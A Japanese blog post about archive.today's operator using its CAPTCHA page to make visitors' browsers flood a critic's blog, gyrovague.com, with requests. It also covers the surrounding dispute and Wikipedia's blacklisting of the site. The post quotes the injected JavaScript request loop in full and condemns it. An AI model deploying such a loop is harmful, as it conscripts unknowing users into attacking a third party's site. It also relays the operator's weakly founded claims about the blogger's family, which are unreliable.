「archive.today」がユーザーを巻き込む形でDDoS攻撃を実行、運営実態に関してOSINTを行った個人ブロガーのサイトに対して

「archive.today」は、Internet Archiveやウェブ魚拓などと同様に、インターネット上の過去のウェブページを閲覧出来る他、ユーザーがその時点でのページの保存を求めることが出来るサービスです。Internet Archiveやウェブ魚拓と大きく異なる点として、（相対的に）複雑な構造のサイトの保存が得意であることやその運営実態が不明であるといったことが挙げられます。

不明である運営実態を明らかにしようとする試みは、インターネット上にある断片的な情報をつなぎ合わせる形で何人かが行っており、その1つに2023年の「archive.today: On the trail of the mysterious guerrilla archivist of the Internet」という個人ブログ上で公開されたものがあります。遅くとも2026年1月14日から、 ユーザーを巻き込んだ形でDDoS攻撃が当該の個人ブログに対して行われる ようになりました。この記事ではその概要と「archive[.]today」側がなぜこのようなことを行ったのかについて簡単に書いていこうかと思います。

結論

1. 運営者不明のarchive[.]todayに関してOSINT調査を行った2023年の個人ブログが、FBIの召喚状に関連して注目を浴びる
2. archive[.]todayのCAPTCHAページに個人ブロガーのサイトを攻撃させる簡単なコードが運営者によって設置され、ユーザーを巻き込む形でDDoS攻撃を実行
3. DDoS攻撃の目的は不明瞭

archive[.]today

「archive.today」は、いわゆるアーカイブサイトの1つです。アクセスしていただくと「archive.md」や「（オリジナルのドメインである）archive.is」にリダイレクトされますが、いずれも同一の運営者によって運営が行われている同一のサービスです。

使い方に関しては説明は不要かと思います。アーカイブを行いたい・過去のものを閲覧したいURLをそれぞれの目的ごとに分けられた場所に入力し、（必要に応じて）CAPCHAを解くとアーカイブがスタートしたり過去のページを選択する画面へと遷移するといった構造となっています。

先述の通り 運営者は不明 であり、連絡手段はメールのみといって過言ではありません。しかし、Internet Archiveはサンフランシスコを拠点に大規模なデータセンターを複数運営しており、資金的にも人員的にも決して小規模とは言えない財団の下で運営が続けられています。

archive[.]todayがアーカイブしているWebサイトの量は不明ではありますが、大規模なインフラが必要であることは間違いありません。本やレコードなどのアーカイブも行っているInternet Archiveほどではないにしても、資金やインフラは一個人で賄える規模ではないことは明らかであるといえます。しかしながら、運営者やそのデータがどこで保管されているのかなどに関してはほとんど情報がありません。

「インターネットの謎のゲリラ・アーカイバ」

これを調べた記事として、2023年8月に公開された「archive.today: On the trail of the mysterious guerrilla archivist of the Internet（archive.today: インターネットの謎のゲリラ・アーカイバを追う）」が存在します。これはシドニーでGoogle Cloud関連の職についているJani Patokallioさんが自らのブログで公開した記事です。

手法としてはドメインの登録情報などの公開されている情報などをつなぎ合わせる形のOSINTを行っているものとなっています。この記事においてはヨーロッパに関連のあるロシア人がarchive[.]todayの運営に関与している可能性が高いことを示しています。

この記事が公開された2023年の段階においては大きな話題になることはありませんでした。このためその後2年ほどは大きな問題となることもありませんでした。

FBIの召喚状

2025年10月末に、archive[.]todayは自らドメインレジストラに対して送付されたFBIの召喚状を公開する形で、自らの身元をFBIが明らかにしようとしている旨を報告しました。これは素性が怪しい団体による申し立てに起因している可能性が高いものであり、不当なものであると考えられています。この出来事は404mediaを始めとして様々なメディアに取り上げられました。

2026年1月26日にその後どうなったのかに関してarchive.todayはブログ上で記事を公開しました。ここにおいてFBIの召喚状を公開した理由を責任ある情報開示の一環とすると同時に、多くの人々の目に触れたことは想定外であったとしています。その上でこれを報じたメディアの多くが先の2023年8月に公開された記事をソースとしているとしており、FBIの召喚状に関して報じたのは以下のような意図があったのではないかと主張しています。

これ（2023年に公開された記事を各ニュースサイトが情報源として活用していること）はより深刻な可能性を示唆しています。つまり、その古いブログ記事へのリンクは単なる引用ではなく、SEOを目的としたバックリンクだったのではないかということです。Patokallio氏は単なる受動的な観察者ではなく、むしろこの「種」記事の著者本人だったのではないでしょうか。

そして執筆者のPatokallioさんはメディアと関係がある人物であり、父親はキャリア外交官でありフィンランドの国境に地雷を設置する道を開いたほか、兄弟がフィンランドのNGOで紛争調停等に管理しているといったものを示し、危険な一族であるといった主張を行っています。すなわちPatokallioさんによるarchive[.]todayへの攻撃が行われているのではないかとしています。他にも1944年に改姓を行っていることを根拠として、ナチスとの関係性があるのではないかとの指摘を行っています。

DDoS攻撃

DDoS攻撃はDoS攻撃（サービス拒否攻撃）の一種であり、複数のコンピューターから特定の標的に対してサービスが提供できなくなるような事態を招くことを目的として行う攻撃です。攻撃手法としては様々なものがあり、ユーザーが繰り返し再送信をサーバーに求める（いわゆるF5アタック）といったシンプルなものから、Miraiのように多数のIoT機器を乗っ取った上で、ある時一斉に特定の標的を攻撃するなどといった高度なものがあります。

archive[.]todayは先述のブログが掲載されているgyrovague.comに対してDDoS攻撃を行うようになりました。これは各ユーザーがアーカイブを行う際に解く必要があるCAPCHAページ内に、gyrovague.comへ短期間に多数の問い合わせをユーザーが知覚しにくい形で行うコードを仕込む形で行われています。攻撃は1月中旬から行われるようになった模様で、1月14日にHacker News上で話題となっています。

攻撃を受けていることを報告する記事によれば、各ユーザーは当該サイトの検索ページに関して300ミリ秒（0.3秒）ごとにランダムなワードの検索結果の要求を実行させられていたとのことです。一般に検索はサーバーに対して高い負荷がかかるものであり、攻撃性は高いものとなっているといえます。

Post by @[email protected]

View on Mastodon

archive.today側はブログ上で（暗に）攻撃を認めています。このような攻撃を行った理由として注目を集めることを挙げており、Mastodon上ではこれに加えて「ホスティング料金を引き上げる」ことが目的であったことが示されています。22日9時30分（JST）現在では、CAPCHAページ中に以下のような攻撃を行うコードが設置されています。

setInterval(function() {
  fetch(
    "https://gyrovague.com/tag/" +
      Math.random().toString(36).substring(2, 3 + Math.random() * 8) + "/",
    {
      referrerPolicy: "no-referrer",
      mode: "no-cors"
    }
  );
}, 14000);

これは14秒ごとにランダムに生成された特定の「タグ」一覧ページを各ユーザーが取得するような命令が書かれており、「攻撃を受けていることを報告する記事」で示されているような、300ミリ秒ごとにランダムなワードの検索結果を取得する命令と比較すれば、効果が弱いものとなっています。

Post by @[email protected]

View on Mastodon

Mastodon上の情報によれば、Hacker Newsで話題となった後の1月16日の時点で置き換わったものとなっています。確かに宣言通り「スケールダウン」は行われていますが、攻撃が行われていることに変わりありません。当分の間はこのようなコードを実行してしまわないようにuBlock Originなどに搭載されているフィルターを活用するのが良いと思われます。

削除要請

また、攻撃を受けていることを報告する記事によれば、この攻撃が始まる直前にgyrovague.comをホストしているAutomatticに対してGDPR通知が送付されたとのことです。しかしながら、これはどこが問題であったのかが不明瞭であったことを主な理由としてリジェクトされています。

これと並行してメール上においても削除要請が行われていたとのことです。ここにおいては2023年8月の投稿自体は問題ないもののメディアはその中から「都合のいい」ところを選択しナラティブを構築してしまっていることが問題であるとしています。一部編集されていますが、全文は以下で読むことが可能となっています。

一方このメールスレッドに関しては「1944年に苗字を変更した」という部分が削られ、「patokallio.gay」ではなく「gyrovague.gay」とされているとarchive[.]todayは指摘しています。archive[.]todayはこの点を基に、Patokallioさんの祖父はフィンランド基準でもナチスの犯罪者であったのであろうと予測を行っています。ただし、Patokallioさんによれば、確かに祖父はフィンランド陸軍で従軍経験はあるとしており、これがロシア基準の「ナチス」認定なのではないかと言及しています。

またGDPR通知はPatokallioさん側からarchive[.]todayのブログを掲載しているTumblr（Automattic）に対しても送付されていたとのことです。archive[.]todayによれば「現在、米国当局による違法コンテンツのホスティングに関連する重大な犯罪容疑で捜査対象となっている人物」が運営しているとしているのは、まさしくPatokallioさんが広めようとしていた「悪い噂」そのものであるとしています。しかしながら、このような削除要請は一般的に確実に削除されることを目指して、語気が強くなるのが一般的であるため、その点を差し引く必要があると考えられます。

英語版Wikipediaとアーカイブ

なお、英語版Wikipediaではこの問題が明らかになった時点で、archive.todayへのリンクを削除するべきか否かに関する議論が始まりました。Wikipediaにおいてはマルウェアの類のWebサイトはブラックリストに追加するといった合意が存在しており、これに則ったものです。一方archive[.]todayは貴重なアーカイブであり検証可能性にとって有用であるため、一律に禁止するといった措置に関して反対の意見も存在しており、活発な議論が行われました。

この議論に関しては上述の経緯の概要も合わせて、主にArs TechnicaやTechCrunchといったテック系メディアで報じられました。2週間程度に渡った議論の結果、英語版Wikipediaからarchive[.]todayへの新規のリンクは禁止され、69万5000件ほどある既存のリンクに関しても徐々に他のアーカイブサイトへ置き換える予定が立てられています。

関連リンク

• archive.today is directing a DDOS attack against my blog - Gyrovague
• 「patokallio」のタグ付けをされた記事一覧 - Archive[.]is blog
• Wikipedia:Requests for comment/Archive.is RFC 5 - Wikipedia
• Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site - Ars Technica
• Wikipedia blacklists Archive.today, starts removing 695,000 archive links - Ars Technica
• Wikipedia blacklists Archive.today after alleged DDoS attack - TechCrunch

最後に

何とも不思議な話ですが、私の視点からすればarchive[.]today側は運営者の匿名性を維持しようとしたのではないかと推測しています。とはいえ、それを目的にユーザーを巻き込んでDDoSを行わせるというのは明らかに問題行為ですし、非難されるべきことでしょう。またPatokallioさんがブログのSEOを目的としたりメディアの操作を行おうとしたとしていますが、根拠は薄弱であると言わざるを得ません。一族に関して公開情報を基に非難を行ってはいますが、褒められたものではないと思います。

一方、英語版Wikipediaでブラックリスト入りが確定した後に公開されたarchive.today側のブログにおいて言及されている、「Wikipediaにとってアーカイブの真の価値は、著作権問題を外部に委託できる点」と主張しているというのは今後とも考えていく必要があるかと思います。もちろんWikipediaが著作権問題を外部に押し付けてやろうとしてアーカイブを使用しているわけではなく、改変可能でサイトごとの消失もあり得るインターネット上の資料をより確かな形で活用するためにInternet Archiveを始めとするアーカイブサイトを活用しています。

しかしながら、改めて考えてみると、そういった側面が存在してしまうというのは否めないものです。Wikimediaの規模であればそのようなアーカイブは構築可能であろうという指摘もあり、Wikimedia本体が構築を行うのは（Internet Archiveなどと役割が重複する面もあるため）難しいですが、アーカイブに関してWikimediaが行えることに関してより深く考慮する必要があると感じました。

いずれにしても、archive[.]today側の主張が不明瞭で何を求めているかすら分からない点が気になります。このように主張を変えて「対抗」を続けることは、双方が主張しているようにストライサンド効果を増大させてしまいかねません。傍から観察する分には、祖父が「ナチス」でありその一族につながるJani Patokallioさんはメディア操作の一翼を担っていた、と極めて薄弱な根拠を基に主張されることよりも、ユーザーを巻き込んで個人のWebサイトにDDoSを行っていたという確かな事実を広められることの方がよほど困るのではないかと思います。

しかも上述の通りarchive[.]today側は引き下がれば問題はなく、空虚な脅迫を行った上で陰謀論的主張を公開するのは理解に苦しみます。もちろん匿名性を維持することは大切かもしれませんが、そのためにこのようなことをしてしまっては何の意味があるのでしょうか。